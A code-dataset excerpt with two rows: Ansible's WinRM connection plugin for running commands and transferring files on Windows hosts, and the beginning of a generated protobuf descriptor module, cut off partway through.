repo_name
stringlengths
5
100
path
stringlengths
4
375
copies
stringclasses
991 values
size
stringlengths
4
7
content
stringlengths
666
1M
license
stringclasses
15 values
michael-dev2rights/ansible
lib/ansible/plugins/connection/winrm.py
2
25568
# (c) 2014, Chris Church <chris@ninemoreminutes.com> # Copyright (c) 2017 Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type DOCUMENTATION = """ author: Ansible Core Team connection: winrm short_description: Run tasks over Microsoft's WinRM description: - Run commands or put/fetch on a target via WinRM version_added: "2.0" options: remote_addr: description: - Address of the windows machine default: inventory_hostname vars: - name: ansible_host - name: ansible_winrm_host remote_user: description: - The user to log in as to the Windows machine vars: - name: ansible_user - name: ansible_winrm_user """ import base64 import inspect import os import re import shlex import traceback import json import tempfile import subprocess HAVE_KERBEROS = False try: import kerberos HAVE_KERBEROS = True except ImportError: pass from ansible.errors import AnsibleError, AnsibleConnectionFailure from ansible.errors import AnsibleFileNotFound from ansible.module_utils.six import string_types from ansible.module_utils.six.moves.urllib.parse import urlunsplit from ansible.module_utils._text import to_bytes, to_native, to_text from ansible.module_utils.six import binary_type from ansible.plugins.connection import ConnectionBase from ansible.plugins.shell.powershell import leaf_exec from ansible.utils.hashing import secure_hash from ansible.utils.path import makedirs_safe try: import winrm from winrm import Response from winrm.protocol import Protocol HAS_WINRM = True except ImportError as e: HAS_WINRM = False try: import xmltodict HAS_XMLTODICT = True except ImportError as e: HAS_XMLTODICT = False try: from __main__ import display except ImportError: from ansible.utils.display import Display display = Display() class Connection(ConnectionBase): '''WinRM connections over HTTP/HTTPS.''' transport = 'winrm' module_implementation_preferences = ('.ps1', 
'.exe', '') become_methods = ['runas'] allow_executable = False def __init__(self, *args, **kwargs): self.has_pipelining = True self.always_pipeline_modules = True self.has_native_async = True self.protocol = None self.shell_id = None self.delegate = None self._shell_type = 'powershell' # FUTURE: Add runas support super(Connection, self).__init__(*args, **kwargs) def set_host_overrides(self, host, variables, templar): ''' Override WinRM-specific options from host variables. ''' if not HAS_WINRM: return hostvars = {} for k in variables: if k.startswith('ansible_winrm'): hostvars[k] = templar.template(variables[k]) self._winrm_host = self._play_context.remote_addr self._winrm_port = int(self._play_context.port or 5986) self._winrm_scheme = hostvars.get('ansible_winrm_scheme', 'http' if self._winrm_port == 5985 else 'https') self._winrm_path = hostvars.get('ansible_winrm_path', '/wsman') self._winrm_user = self._play_context.remote_user self._winrm_pass = self._play_context.password self._become_method = self._play_context.become_method self._become_user = self._play_context.become_user self._become_pass = self._play_context.become_pass self._kinit_cmd = hostvars.get('ansible_winrm_kinit_cmd', 'kinit') if hasattr(winrm, 'FEATURE_SUPPORTED_AUTHTYPES'): self._winrm_supported_authtypes = set(winrm.FEATURE_SUPPORTED_AUTHTYPES) else: # for legacy versions of pywinrm, use the values we know are supported self._winrm_supported_authtypes = set(['plaintext', 'ssl', 'kerberos']) # TODO: figure out what we want to do with auto-transport selection in the face of NTLM/Kerb/CredSSP/Cert/Basic transport_selector = 'ssl' if self._winrm_scheme == 'https' else 'plaintext' if HAVE_KERBEROS and ((self._winrm_user and '@' in self._winrm_user)): self._winrm_transport = 'kerberos,%s' % transport_selector else: self._winrm_transport = transport_selector self._winrm_transport = hostvars.get('ansible_winrm_transport', self._winrm_transport) if isinstance(self._winrm_transport, string_types): 
self._winrm_transport = [x.strip() for x in self._winrm_transport.split(',') if x.strip()] unsupported_transports = set(self._winrm_transport).difference(self._winrm_supported_authtypes) if unsupported_transports: raise AnsibleError('The installed version of WinRM does not support transport(s) %s' % list(unsupported_transports)) # if kerberos is among our transports and there's a password specified, we're managing the tickets kinit_mode = to_text(hostvars.get('ansible_winrm_kinit_mode', '')).strip() if kinit_mode == "": # HACK: ideally, remove multi-transport stuff self._kerb_managed = "kerberos" in self._winrm_transport and self._winrm_pass elif kinit_mode == "managed": self._kerb_managed = True elif kinit_mode == "manual": self._kerb_managed = False else: raise AnsibleError('Unknown ansible_winrm_kinit_mode value: "%s" (must be "managed" or "manual")' % kinit_mode) # arg names we're going passing directly internal_kwarg_mask = set(['self', 'endpoint', 'transport', 'username', 'password', 'scheme', 'path', 'kinit_mode', 'kinit_cmd']) self._winrm_kwargs = dict(username=self._winrm_user, password=self._winrm_pass) argspec = inspect.getargspec(Protocol.__init__) supported_winrm_args = set(argspec.args) supported_winrm_args.update(internal_kwarg_mask) passed_winrm_args = set([v.replace('ansible_winrm_', '') for v in hostvars if v.startswith('ansible_winrm_')]) unsupported_args = passed_winrm_args.difference(supported_winrm_args) # warn for kwargs unsupported by the installed version of pywinrm for arg in unsupported_args: display.warning("ansible_winrm_{0} unsupported by pywinrm (is an up-to-date version of pywinrm installed?)".format(arg)) # pass through matching kwargs, excluding the list we want to treat specially for arg in passed_winrm_args.difference(internal_kwarg_mask).intersection(supported_winrm_args): self._winrm_kwargs[arg] = hostvars['ansible_winrm_%s' % arg] # Until pykerberos has enough goodies to implement a rudimentary kinit/klist, simplest way is to 
let each connection # auth itself with a private CCACHE. def _kerb_auth(self, principal, password): if password is None: password = "" self._kerb_ccache = tempfile.NamedTemporaryFile() display.vvvvv("creating Kerberos CC at %s" % self._kerb_ccache.name) krb5ccname = "FILE:%s" % self._kerb_ccache.name krbenv = dict(KRB5CCNAME=krb5ccname) os.environ["KRB5CCNAME"] = krb5ccname kinit_cmdline = [self._kinit_cmd, principal] display.vvvvv("calling kinit for principal %s" % principal) p = subprocess.Popen(kinit_cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=krbenv) # TODO: unicode/py3 stdout, stderr = p.communicate(password + b'\n') if p.returncode != 0: raise AnsibleConnectionFailure("Kerberos auth failure: %s" % stderr.strip()) display.vvvvv("kinit succeeded for principal %s" % principal) def _winrm_connect(self): ''' Establish a WinRM connection over HTTP/HTTPS. ''' display.vvv("ESTABLISH WINRM CONNECTION FOR USER: %s on PORT %s TO %s" % (self._winrm_user, self._winrm_port, self._winrm_host), host=self._winrm_host) netloc = '%s:%d' % (self._winrm_host, self._winrm_port) endpoint = urlunsplit((self._winrm_scheme, netloc, self._winrm_path, '', '')) errors = [] for transport in self._winrm_transport: if transport == 'kerberos': if not HAVE_KERBEROS: errors.append('kerberos: the python kerberos library is not installed') continue if self._kerb_managed: self._kerb_auth(self._winrm_user, self._winrm_pass) display.vvvvv('WINRM CONNECT: transport=%s endpoint=%s' % (transport, endpoint), host=self._winrm_host) try: protocol = Protocol(endpoint, transport=transport, **self._winrm_kwargs) # open the shell from connect so we know we're able to talk to the server if not self.shell_id: self.shell_id = protocol.open_shell(codepage=65001) # UTF-8 display.vvvvv('WINRM OPEN SHELL: %s' % self.shell_id, host=self._winrm_host) return protocol except Exception as e: err_msg = to_text(e).strip() if re.search(to_text(r'Operation\s+?timed\s+?out'), err_msg, 
re.I): raise AnsibleError('the connection attempt timed out') m = re.search(to_text(r'Code\s+?(\d{3})'), err_msg) if m: code = int(m.groups()[0]) if code == 401: err_msg = 'the specified credentials were rejected by the server' elif code == 411: return protocol errors.append(u'%s: %s' % (transport, err_msg)) display.vvvvv(u'WINRM CONNECTION ERROR: %s\n%s' % (err_msg, to_text(traceback.format_exc())), host=self._winrm_host) if errors: raise AnsibleConnectionFailure(', '.join(map(to_native, errors))) else: raise AnsibleError('No transport found for WinRM connection') def _winrm_send_input(self, protocol, shell_id, command_id, stdin, eof=False): rq = {'env:Envelope': protocol._get_soap_header( resource_uri='http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd', action='http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Send', shell_id=shell_id)} stream = rq['env:Envelope'].setdefault('env:Body', {}).setdefault('rsp:Send', {})\ .setdefault('rsp:Stream', {}) stream['@Name'] = 'stdin' stream['@CommandId'] = command_id stream['#text'] = base64.b64encode(to_bytes(stdin)) if eof: stream['@End'] = 'true' protocol.send_message(xmltodict.unparse(rq)) def _winrm_exec(self, command, args=(), from_exec=False, stdin_iterator=None): if not self.protocol: self.protocol = self._winrm_connect() self._connected = True if from_exec: display.vvvvv("WINRM EXEC %r %r" % (command, args), host=self._winrm_host) else: display.vvvvvv("WINRM EXEC %r %r" % (command, args), host=self._winrm_host) command_id = None try: stdin_push_failed = False command_id = self.protocol.run_command(self.shell_id, to_bytes(command), map(to_bytes, args), console_mode_stdin=(stdin_iterator is None)) # TODO: try/except around this, so we can get/return the command result on a broken pipe or other failure (probably more useful than the 500 that # comes from this) try: if stdin_iterator: for (data, is_last) in stdin_iterator: self._winrm_send_input(self.protocol, self.shell_id, command_id, data, 
eof=is_last) except Exception as ex: from traceback import format_exc display.warning("FATAL ERROR DURING FILE TRANSFER: %s" % format_exc(ex)) stdin_push_failed = True if stdin_push_failed: raise AnsibleError('winrm send_input failed') # NB: this can hang if the receiver is still running (eg, network failed a Send request but the server's still happy). # FUTURE: Consider adding pywinrm status check/abort operations to see if the target is still running after a failure. resptuple = self.protocol.get_command_output(self.shell_id, command_id) # ensure stdout/stderr are text for py3 # FUTURE: this should probably be done internally by pywinrm response = Response(tuple(to_text(v) if isinstance(v, binary_type) else v for v in resptuple)) # TODO: check result from response and set stdin_push_failed if we have nonzero if from_exec: display.vvvvv('WINRM RESULT %r' % to_text(response), host=self._winrm_host) else: display.vvvvvv('WINRM RESULT %r' % to_text(response), host=self._winrm_host) display.vvvvvv('WINRM STDOUT %s' % to_text(response.std_out), host=self._winrm_host) display.vvvvvv('WINRM STDERR %s' % to_text(response.std_err), host=self._winrm_host) if stdin_push_failed: raise AnsibleError('winrm send_input failed; \nstdout: %s\nstderr %s' % (response.std_out, response.std_err)) return response finally: if command_id: self.protocol.cleanup_command(self.shell_id, command_id) def _connect(self): if not HAS_WINRM: raise AnsibleError("winrm or requests is not installed: %s" % to_text(e)) elif not HAS_XMLTODICT: raise AnsibleError("xmltodict is not installed: %s" % to_text(e)) super(Connection, self)._connect() if not self.protocol: self.protocol = self._winrm_connect() self._connected = True return self def _reset(self): # used by win_reboot (and any other action that might need to bounce the state) self.protocol = None self.shell_id = None self._connect() def _create_raw_wrapper_payload(self, cmd, environment=dict()): payload = { 'module_entry': 
to_text(base64.b64encode(to_bytes(cmd))), 'powershell_modules': {}, 'actions': ['exec'], 'exec': to_text(base64.b64encode(to_bytes(leaf_exec))), 'environment': environment } return json.dumps(payload) def _wrapper_payload_stream(self, payload, buffer_size=200000): payload_bytes = to_bytes(payload) byte_count = len(payload_bytes) for i in range(0, byte_count, buffer_size): yield payload_bytes[i:i + buffer_size], i + buffer_size >= byte_count def exec_command(self, cmd, in_data=None, sudoable=True): super(Connection, self).exec_command(cmd, in_data=in_data, sudoable=sudoable) cmd_parts = self._shell._encode_script(cmd, as_list=True, strict_mode=False, preserve_rc=False) # TODO: display something meaningful here display.vvv("EXEC (via pipeline wrapper)") stdin_iterator = None if in_data: stdin_iterator = self._wrapper_payload_stream(in_data) result = self._winrm_exec(cmd_parts[0], cmd_parts[1:], from_exec=True, stdin_iterator=stdin_iterator) result.std_out = to_bytes(result.std_out) result.std_err = to_bytes(result.std_err) # parse just stderr from CLIXML output if self.is_clixml(result.std_err): try: result.std_err = self.parse_clixml_stream(result.std_err) except: # unsure if we're guaranteed a valid xml doc- use raw output in case of error pass return (result.status_code, result.std_out, result.std_err) def exec_command_old(self, cmd, in_data=None, sudoable=True): super(Connection, self).exec_command(cmd, in_data=in_data, sudoable=sudoable) cmd_parts = shlex.split(to_bytes(cmd), posix=False) cmd_parts = map(to_text, cmd_parts) script = None cmd_ext = cmd_parts and self._shell._unquote(cmd_parts[0]).lower()[-4:] or '' # Support running .ps1 files (via script/raw). if cmd_ext == '.ps1': script = '& %s' % cmd # Support running .bat/.cmd files; change back to the default system encoding instead of UTF-8. 
elif cmd_ext in ('.bat', '.cmd'): script = '[System.Console]::OutputEncoding = [System.Text.Encoding]::Default; & %s' % cmd # Encode the command if not already encoded; supports running simple PowerShell commands via raw. elif '-EncodedCommand' not in cmd_parts: script = cmd if script: cmd_parts = self._shell._encode_script(script, as_list=True, strict_mode=False) if '-EncodedCommand' in cmd_parts: encoded_cmd = cmd_parts[cmd_parts.index('-EncodedCommand') + 1] decoded_cmd = to_text(base64.b64decode(encoded_cmd).decode('utf-16-le')) display.vvv("EXEC %s" % decoded_cmd, host=self._winrm_host) else: display.vvv("EXEC %s" % cmd, host=self._winrm_host) try: result = self._winrm_exec(cmd_parts[0], cmd_parts[1:], from_exec=True) except Exception: traceback.print_exc() raise AnsibleConnectionFailure("failed to exec cmd %s" % cmd) result.std_out = to_bytes(result.std_out) result.std_err = to_bytes(result.std_err) # parse just stderr from CLIXML output if self.is_clixml(result.std_err): try: result.std_err = self.parse_clixml_stream(result.std_err) except: # unsure if we're guaranteed a valid xml doc- use raw output in case of error pass return (result.status_code, result.std_out, result.std_err) def is_clixml(self, value): return value.startswith(b"#< CLIXML") # hacky way to get just stdout- not always sure of doc framing here, so use with care def parse_clixml_stream(self, clixml_doc, stream_name='Error'): clear_xml = clixml_doc.replace(b'#< CLIXML\r\n', b'') doc = xmltodict.parse(clear_xml) lines = [l.get('#text', '').replace('_x000D__x000A_', '') for l in doc.get('Objs', {}).get('S', {}) if l.get('@S') == stream_name] return '\r\n'.join(lines) # FUTURE: determine buffer size at runtime via remote winrm config? 
def _put_file_stdin_iterator(self, in_path, out_path, buffer_size=250000): in_size = os.path.getsize(to_bytes(in_path, errors='surrogate_or_strict')) offset = 0 with open(to_bytes(in_path, errors='surrogate_or_strict'), 'rb') as in_file: for out_data in iter((lambda: in_file.read(buffer_size)), b''): offset += len(out_data) self._display.vvvvv('WINRM PUT "%s" to "%s" (offset=%d size=%d)' % (in_path, out_path, offset, len(out_data)), host=self._winrm_host) # yes, we're double-encoding over the wire in this case- we want to ensure that the data shipped to the end PS pipeline is still b64-encoded b64_data = base64.b64encode(out_data) + b'\r\n' # cough up the data, as well as an indicator if this is the last chunk so winrm_send knows to set the End signal yield b64_data, (in_file.tell() == in_size) if offset == 0: # empty file, return an empty buffer + eof to close it yield "", True def put_file(self, in_path, out_path): super(Connection, self).put_file(in_path, out_path) out_path = self._shell._unquote(out_path) display.vvv('PUT "%s" TO "%s"' % (in_path, out_path), host=self._winrm_host) if not os.path.exists(to_bytes(in_path, errors='surrogate_or_strict')): raise AnsibleFileNotFound('file or module does not exist: "%s"' % in_path) script_template = u''' begin {{ $path = '{0}' $DebugPreference = "Continue" $ErrorActionPreference = "Stop" Set-StrictMode -Version 2 $fd = [System.IO.File]::Create($path) $sha1 = [System.Security.Cryptography.SHA1CryptoServiceProvider]::Create() $bytes = @() #initialize for empty file case }} process {{ $bytes = [System.Convert]::FromBase64String($input) $sha1.TransformBlock($bytes, 0, $bytes.Length, $bytes, 0) | Out-Null $fd.Write($bytes, 0, $bytes.Length) }} end {{ $sha1.TransformFinalBlock($bytes, 0, 0) | Out-Null $hash = [System.BitConverter]::ToString($sha1.Hash).Replace("-", "").ToLowerInvariant() $fd.Close() Write-Output "{{""sha1"":""$hash""}}" }} ''' script = script_template.format(self._shell._escape(out_path)) cmd_parts = 
self._shell._encode_script(script, as_list=True, strict_mode=False, preserve_rc=False) result = self._winrm_exec(cmd_parts[0], cmd_parts[1:], stdin_iterator=self._put_file_stdin_iterator(in_path, out_path)) # TODO: improve error handling if result.status_code != 0: raise AnsibleError(to_native(result.std_err)) put_output = json.loads(result.std_out) remote_sha1 = put_output.get("sha1") if not remote_sha1: raise AnsibleError("Remote sha1 was not returned") local_sha1 = secure_hash(in_path) if not remote_sha1 == local_sha1: raise AnsibleError("Remote sha1 hash {0} does not match local hash {1}".format(to_native(remote_sha1), to_native(local_sha1))) def fetch_file(self, in_path, out_path): super(Connection, self).fetch_file(in_path, out_path) in_path = self._shell._unquote(in_path) out_path = out_path.replace('\\', '/') display.vvv('FETCH "%s" TO "%s"' % (in_path, out_path), host=self._winrm_host) buffer_size = 2**19 # 0.5MB chunks makedirs_safe(os.path.dirname(out_path)) out_file = None try: offset = 0 while True: try: script = ''' If (Test-Path -PathType Leaf "%(path)s") { $stream = New-Object IO.FileStream("%(path)s", [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [IO.FileShare]::ReadWrite); $stream.Seek(%(offset)d, [System.IO.SeekOrigin]::Begin) | Out-Null; $buffer = New-Object Byte[] %(buffer_size)d; $bytesRead = $stream.Read($buffer, 0, %(buffer_size)d); $bytes = $buffer[0..($bytesRead-1)]; [System.Convert]::ToBase64String($bytes); $stream.Close() | Out-Null; } ElseIf (Test-Path -PathType Container "%(path)s") { Write-Host "[DIR]"; } Else { Write-Error "%(path)s does not exist"; Exit 1; } ''' % dict(buffer_size=buffer_size, path=self._shell._escape(in_path), offset=offset) display.vvvvv('WINRM FETCH "%s" to "%s" (offset=%d)' % (in_path, out_path, offset), host=self._winrm_host) cmd_parts = self._shell._encode_script(script, as_list=True, preserve_rc=False) result = self._winrm_exec(cmd_parts[0], cmd_parts[1:]) if result.status_code != 0: raise 
IOError(to_native(result.std_err)) if result.std_out.strip() == '[DIR]': data = None else: data = base64.b64decode(result.std_out.strip()) if data is None: makedirs_safe(out_path) break else: if not out_file: # If out_path is a directory and we're expecting a file, bail out now. if os.path.isdir(to_bytes(out_path, errors='surrogate_or_strict')): break out_file = open(to_bytes(out_path, errors='surrogate_or_strict'), 'wb') out_file.write(data) if len(data) < buffer_size: break offset += len(data) except Exception: traceback.print_exc() raise AnsibleError('failed to transfer file to "%s"' % out_path) finally: if out_file: out_file.close() def close(self): if self.protocol and self.shell_id: display.vvvvv('WINRM CLOSE SHELL: %s' % self.shell_id, host=self._winrm_host) self.protocol.close_shell(self.shell_id) self.shell_id = None self.protocol = None self._connected = False
gpl-3.0
ltilve/ChromiumGStreamerBackend
third_party/protobuf/descriptor_pb2.py
193
48695
# Generated by the protocol buffer compiler. DO NOT EDIT! from google.protobuf import descriptor from google.protobuf import message from google.protobuf import reflection # @@protoc_insertion_point(imports) DESCRIPTOR = descriptor.FileDescriptor( name='google/protobuf/descriptor.proto', package='google.protobuf', serialized_pb='\n google/protobuf/descriptor.proto\x12\x0fgoogle.protobuf\"G\n\x11\x46ileDescriptorSet\x12\x32\n\x04\x66ile\x18\x01 \x03(\x0b\x32$.google.protobuf.FileDescriptorProto\"\xdc\x02\n\x13\x46ileDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07package\x18\x02 \x01(\t\x12\x12\n\ndependency\x18\x03 \x03(\t\x12\x36\n\x0cmessage_type\x18\x04 \x03(\x0b\x32 .google.protobuf.DescriptorProto\x12\x37\n\tenum_type\x18\x05 \x03(\x0b\x32$.google.protobuf.EnumDescriptorProto\x12\x38\n\x07service\x18\x06 \x03(\x0b\x32\'.google.protobuf.ServiceDescriptorProto\x12\x38\n\textension\x18\x07 \x03(\x0b\x32%.google.protobuf.FieldDescriptorProto\x12-\n\x07options\x18\x08 \x01(\x0b\x32\x1c.google.protobuf.FileOptions\"\xa9\x03\n\x0f\x44\x65scriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x34\n\x05\x66ield\x18\x02 \x03(\x0b\x32%.google.protobuf.FieldDescriptorProto\x12\x38\n\textension\x18\x06 \x03(\x0b\x32%.google.protobuf.FieldDescriptorProto\x12\x35\n\x0bnested_type\x18\x03 \x03(\x0b\x32 .google.protobuf.DescriptorProto\x12\x37\n\tenum_type\x18\x04 \x03(\x0b\x32$.google.protobuf.EnumDescriptorProto\x12H\n\x0f\x65xtension_range\x18\x05 \x03(\x0b\x32/.google.protobuf.DescriptorProto.ExtensionRange\x12\x30\n\x07options\x18\x07 \x01(\x0b\x32\x1f.google.protobuf.MessageOptions\x1a,\n\x0e\x45xtensionRange\x12\r\n\x05start\x18\x01 \x01(\x05\x12\x0b\n\x03\x65nd\x18\x02 \x01(\x05\"\x94\x05\n\x14\x46ieldDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06number\x18\x03 \x01(\x05\x12:\n\x05label\x18\x04 \x01(\x0e\x32+.google.protobuf.FieldDescriptorProto.Label\x12\x38\n\x04type\x18\x05 
\x01(\x0e\x32*.google.protobuf.FieldDescriptorProto.Type\x12\x11\n\ttype_name\x18\x06 \x01(\t\x12\x10\n\x08\x65xtendee\x18\x02 \x01(\t\x12\x15\n\rdefault_value\x18\x07 \x01(\t\x12.\n\x07options\x18\x08 \x01(\x0b\x32\x1d.google.protobuf.FieldOptions\"\xb6\x02\n\x04Type\x12\x0f\n\x0bTYPE_DOUBLE\x10\x01\x12\x0e\n\nTYPE_FLOAT\x10\x02\x12\x0e\n\nTYPE_INT64\x10\x03\x12\x0f\n\x0bTYPE_UINT64\x10\x04\x12\x0e\n\nTYPE_INT32\x10\x05\x12\x10\n\x0cTYPE_FIXED64\x10\x06\x12\x10\n\x0cTYPE_FIXED32\x10\x07\x12\r\n\tTYPE_BOOL\x10\x08\x12\x0f\n\x0bTYPE_STRING\x10\t\x12\x0e\n\nTYPE_GROUP\x10\n\x12\x10\n\x0cTYPE_MESSAGE\x10\x0b\x12\x0e\n\nTYPE_BYTES\x10\x0c\x12\x0f\n\x0bTYPE_UINT32\x10\r\x12\r\n\tTYPE_ENUM\x10\x0e\x12\x11\n\rTYPE_SFIXED32\x10\x0f\x12\x11\n\rTYPE_SFIXED64\x10\x10\x12\x0f\n\x0bTYPE_SINT32\x10\x11\x12\x0f\n\x0bTYPE_SINT64\x10\x12\"C\n\x05Label\x12\x12\n\x0eLABEL_OPTIONAL\x10\x01\x12\x12\n\x0eLABEL_REQUIRED\x10\x02\x12\x12\n\x0eLABEL_REPEATED\x10\x03\"\x8c\x01\n\x13\x45numDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x38\n\x05value\x18\x02 \x03(\x0b\x32).google.protobuf.EnumValueDescriptorProto\x12-\n\x07options\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.EnumOptions\"l\n\x18\x45numValueDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06number\x18\x02 \x01(\x05\x12\x32\n\x07options\x18\x03 \x01(\x0b\x32!.google.protobuf.EnumValueOptions\"\x90\x01\n\x16ServiceDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x36\n\x06method\x18\x02 \x03(\x0b\x32&.google.protobuf.MethodDescriptorProto\x12\x30\n\x07options\x18\x03 \x01(\x0b\x32\x1f.google.protobuf.ServiceOptions\"\x7f\n\x15MethodDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x12\n\ninput_type\x18\x02 \x01(\t\x12\x13\n\x0boutput_type\x18\x03 \x01(\t\x12/\n\x07options\x18\x04 \x01(\x0b\x32\x1e.google.protobuf.MethodOptions\"\xa4\x03\n\x0b\x46ileOptions\x12\x14\n\x0cjava_package\x18\x01 \x01(\t\x12\x1c\n\x14java_outer_classname\x18\x08 \x01(\t\x12\"\n\x13java_multiple_files\x18\n 
\x01(\x08:\x05\x66\x61lse\x12\x46\n\x0coptimize_for\x18\t \x01(\x0e\x32).google.protobuf.FileOptions.OptimizeMode:\x05SPEED\x12!\n\x13\x63\x63_generic_services\x18\x10 \x01(\x08:\x04true\x12#\n\x15java_generic_services\x18\x11 \x01(\x08:\x04true\x12!\n\x13py_generic_services\x18\x12 \x01(\x08:\x04true\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption\":\n\x0cOptimizeMode\x12\t\n\x05SPEED\x10\x01\x12\r\n\tCODE_SIZE\x10\x02\x12\x10\n\x0cLITE_RUNTIME\x10\x03*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"\xb8\x01\n\x0eMessageOptions\x12&\n\x17message_set_wire_format\x18\x01 \x01(\x08:\x05\x66\x61lse\x12.\n\x1fno_standard_descriptor_accessor\x18\x02 \x01(\x08:\x05\x66\x61lse\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"\x94\x02\n\x0c\x46ieldOptions\x12:\n\x05\x63type\x18\x01 \x01(\x0e\x32#.google.protobuf.FieldOptions.CType:\x06STRING\x12\x0e\n\x06packed\x18\x02 \x01(\x08\x12\x19\n\ndeprecated\x18\x03 \x01(\x08:\x05\x66\x61lse\x12\x1c\n\x14\x65xperimental_map_key\x18\t \x01(\t\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption\"/\n\x05\x43Type\x12\n\n\x06STRING\x10\x00\x12\x08\n\x04\x43ORD\x10\x01\x12\x10\n\x0cSTRING_PIECE\x10\x02*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"]\n\x0b\x45numOptions\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"b\n\x10\x45numValueOptions\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"`\n\x0eServiceOptions\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"_\n\rMethodOptions\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 
\x03(\x0b\x32$.google.protobuf.UninterpretedOption*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"\x85\x02\n\x13UninterpretedOption\x12;\n\x04name\x18\x02 \x03(\x0b\x32-.google.protobuf.UninterpretedOption.NamePart\x12\x18\n\x10identifier_value\x18\x03 \x01(\t\x12\x1a\n\x12positive_int_value\x18\x04 \x01(\x04\x12\x1a\n\x12negative_int_value\x18\x05 \x01(\x03\x12\x14\n\x0c\x64ouble_value\x18\x06 \x01(\x01\x12\x14\n\x0cstring_value\x18\x07 \x01(\x0c\x1a\x33\n\x08NamePart\x12\x11\n\tname_part\x18\x01 \x02(\t\x12\x14\n\x0cis_extension\x18\x02 \x02(\x08\x42)\n\x13\x63om.google.protobufB\x10\x44\x65scriptorProtosH\x01') _FIELDDESCRIPTORPROTO_TYPE = descriptor.EnumDescriptor( name='Type', full_name='google.protobuf.FieldDescriptorProto.Type', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor( name='TYPE_DOUBLE', index=0, number=1, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_FLOAT', index=1, number=2, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_INT64', index=2, number=3, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_UINT64', index=3, number=4, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_INT32', index=4, number=5, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_FIXED64', index=5, number=6, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_FIXED32', index=6, number=7, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_BOOL', index=7, number=8, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_STRING', index=8, number=9, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_GROUP', index=9, number=10, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_MESSAGE', index=10, number=11, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_BYTES', index=11, number=12, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_UINT32', 
index=12, number=13, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_ENUM', index=13, number=14, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_SFIXED32', index=14, number=15, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_SFIXED64', index=15, number=16, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_SINT32', index=16, number=17, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_SINT64', index=17, number=18, options=None, type=None), ], containing_type=None, options=None, serialized_start=1187, serialized_end=1497, ) _FIELDDESCRIPTORPROTO_LABEL = descriptor.EnumDescriptor( name='Label', full_name='google.protobuf.FieldDescriptorProto.Label', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor( name='LABEL_OPTIONAL', index=0, number=1, options=None, type=None), descriptor.EnumValueDescriptor( name='LABEL_REQUIRED', index=1, number=2, options=None, type=None), descriptor.EnumValueDescriptor( name='LABEL_REPEATED', index=2, number=3, options=None, type=None), ], containing_type=None, options=None, serialized_start=1499, serialized_end=1566, ) _FILEOPTIONS_OPTIMIZEMODE = descriptor.EnumDescriptor( name='OptimizeMode', full_name='google.protobuf.FileOptions.OptimizeMode', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor( name='SPEED', index=0, number=1, options=None, type=None), descriptor.EnumValueDescriptor( name='CODE_SIZE', index=1, number=2, options=None, type=None), descriptor.EnumValueDescriptor( name='LITE_RUNTIME', index=2, number=3, options=None, type=None), ], containing_type=None, options=None, serialized_start=2449, serialized_end=2507, ) _FIELDOPTIONS_CTYPE = descriptor.EnumDescriptor( name='CType', full_name='google.protobuf.FieldOptions.CType', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor( name='STRING', index=0, number=0, options=None, type=None), descriptor.EnumValueDescriptor( 
